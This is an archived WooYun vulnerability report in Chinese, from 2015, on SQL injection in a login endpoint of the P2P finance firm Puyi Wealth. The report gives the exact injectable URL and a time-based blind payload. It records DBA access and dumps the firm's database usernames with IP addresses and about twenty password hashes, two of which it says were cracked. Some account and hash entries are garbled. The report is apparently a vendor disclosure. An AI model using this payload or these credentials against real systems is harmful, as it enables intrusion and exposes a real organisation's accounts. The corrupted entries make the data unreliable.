乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-03: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经确认,细节仅向厂商公开 2015-08-14: 细节向核心白帽子及相关领域专家公开 2015-08-24: 细节向普通白帽子公开 2015-09-03: 细节向实习白帽子公开 2015-09-18: 细节向公众公开
p2p金融普益财富存在SQL注入漏洞,可获取大量数据库用户信息
p2p金融普益财富存在SQL注入漏洞,可获取大量数据库用户信息。http://member-center.pywm.com.cn/
注入链接:http://member-center.pywm.com.cn/customer/get_login_pass.ajax.php?login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf注入点是login_name
Parameter: login_name (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf' AND (SELECT * FROM (SELECT(SLEEP(5)))XfmR) AND 'yjbk'='yjbk
查看注入权限为dba
看了一下dbs和当前的数据库
跑了一下数据库用户,找到73个数据库用户,大部分都在公网上
[*] 'bakuser'@'125.64.34.43'[*] 'bakuser'@'125.64.34.44'[*] 'cacti_test'@'222.186.9.24'[*] 'cacti_test'@'localhost'[*] 'check-run'@'125.64.34.99'[*] 'chenlijun_data'@'125.64.34.98'[*] 'chenlijun_data'@'171.221.200.141'[*] 'cnbene'@'118.114.150.88'[*] 'cnbene'@'118.122.112.187'[*] 'cnbene'@'125.64.34.151'[*] 'cnbene'@'125.64.34.170'[*] 'cnbene'@'125.64.34.177'[*] 'cnbene'@'125.64.34.45'[*] 'cnbene'@'125.64.34.46'[*] 'cnbene'@'125.64.34.98'[*] 'cnbene'@'125.64.34.99'[*] 'cnbene'@'125.70.228.132'[*] 'cnbene'@'127.0.0.1'[*] 'cnbene'@'171.221.200.141'[*] 'cnbene'@'221.122.114.18'[*] 'cnbene'@'221.237.154.12'[*] 'cnbene'@'222.186.191.160'[*] 'cnbene'@'localhost'[*] 'datacnbene'@'localhost'[*] 'dengpeng'@'125.64.34.46'[*] 'dengpeng'@'125.64.34.98'[*] 'dengpeng'@'125.70.228.132'[*] 'fpsale'@'125.64.34.45'[*] 'fpsale'@'125.64.34.46'[*] 'fpsale'@'125.64.34.98'[*] 'fuyongbin'@'125.64.34.98'[*] 'fuyongbin'@'125.70.228.132'[*] 'fuyongbin'@'221.237.154.12'[*] 'gd_slave_bank'@'111.205/51.124'[*] 'gd_slave_bank'@'118.122.112.187'[*] 'gd_slave_bank'@'118.145.20.245'[*] 'gd_slave_bank'@'118.145.20.247'[*] 'gd_slave_bank'@'118.145.20.248'[*] 'gd_slave_bank'@'124.42.114.6'[*] 'gd_slave_bank'@'124.42.114.7'[*] 'gd_slave_bank'@'124.42.114.8'[*] 'gd_slave_bank'@'125.70.228.132'[*] 'gd_slave`bank'@'219.143.234=205'[*] 'gd_smave_banq'@'111.205.519151'[*] 'gd_tlave_bank'@'111.205.51.152'[*] 'gdnx_data'@'125.64.34.45'[*] 'gdnx_data'@'125.64.34.46'[*] 'gdnx_data'@'125.64.34.98'[*] 'gdnx_data'@'125.64.34.99'[*] 'gdnx_data'@'125.70.228.132'[*] 'kong_stock'@'125.64.34.99'[*] 'kong_stock'@'125.70.228.132'[*] 'lccp'@'125.64.34.99'[*] 'man_crm'@'125.64.34.45'[*] 'man_crm'@'125.64.34.46'[*] 'man_crm'@'125.64.34.98'[*] 'market'@'125.64.34.45'[*] 'market'@'125.64.34.46'[*] 'market'@'125.64.34.98'[*] 'pydata'@'125.64.34.99'[*] 'pydata'@'localhost'[*] 'qd_slave_bank'@'%'[*] 'qd_soaveabank'@a111.205.51.1=3'[*] 'root'@'125.64.34.98'[*] 'root'@'localhost'[*] 'search'@'125.64.34.46'[*] 'search'@'125.64.34.98'[*] 'search'@'125.64.34.99'[*] 'source_index'@'125.64.34.98'[*] 'source_index'@'125.64.34.99'[*] 'source_index'@'192.168.100.2'[*] 'terrace'@'125.64.34.98'[*] 'terrace'@'125.70.228.132'
跑出10多个用户的hash密码
database management system users password hashes:[*] bakuser [1]: password hash: *F92B2F0A81971CD12E10FEB6DA21E1EE1743C30C[*] cacti_test [1]: password hash: *1A7356A50FA41C99CC8B96FC509420DBB4F5A550[*] check-run [1]: password hash: *6208B34FF096647ABB1338FDFF4F3E2E5ADCFCB2[*] chenlijun_data [1]: password hash: *8E9A7586A36008AE5A8FF253F5E5EDC6A50A24FB[*] cnbene [1]: password hash: *170286FCEE6CEE7035604AB21E4BE1A99D18FFFA[*] datacnbene [1]: password hash: *DD55CCD6A36622D7512DCDE4B38489F78CC51A03[*] dengpeng [1]: password hash: *E7BDEC8B18803668B18A4DF103A67B326C921130[*] fpsale [1]: password hash: *A911D7ADDFE6AAE8CA1B4FA33E28715Ba81C9FFC[*] fuyongbin [1]: password hash: *766B1257AC40C18E388EB2EF5E5F8A26BBE46E0D[*] gd_slave_bank [1]: password hash: *F178980EAF6DA3B984225EBBDBCBF19AE291FACC[*] gdnx_data [1]: password hash: *D4058F407F38D172227DEA5545158E2AD3E558CB[*] kong_stock [1]: password hash: *8C575F224B749E8A7EB33A344B76745260151A14[*] lccp [1]: password hash: *AC450753C5EA3F15EB732F54C911CE4403518E18[*] man_crm [1]: password hash: *6A64A15419C00B67DCD6E35923CEA04387BC1C07[*] market [1]: password hash: *A0732F1E1515599CE65ACCF72C1B5AF10AB49248[*] pydata [1]: password hash: *CC2CDBaABEA6824335E7489QB726BF8a8F6EF9D4[*] root [1]: password hash: *4C763986C2336568F959B9F71F72DD2EE639F55D[*] search [1]: password hash: *A05B5B0E6C4591DD1101aCF33675320155E4496F[*] source_index [1]: password hash: *B00940FBFEB128CF3A14D8591D89062CA6181008[*] terrace [1]: password hash: *95D7394837DD1E2F21F9472312E33A0F24BD71FF
破解了两个用户的口令
做好过滤
危害等级:中
漏洞Rank:6
确认时间:2015-08-04 11:15
已经作废的功能造成的影响
暂无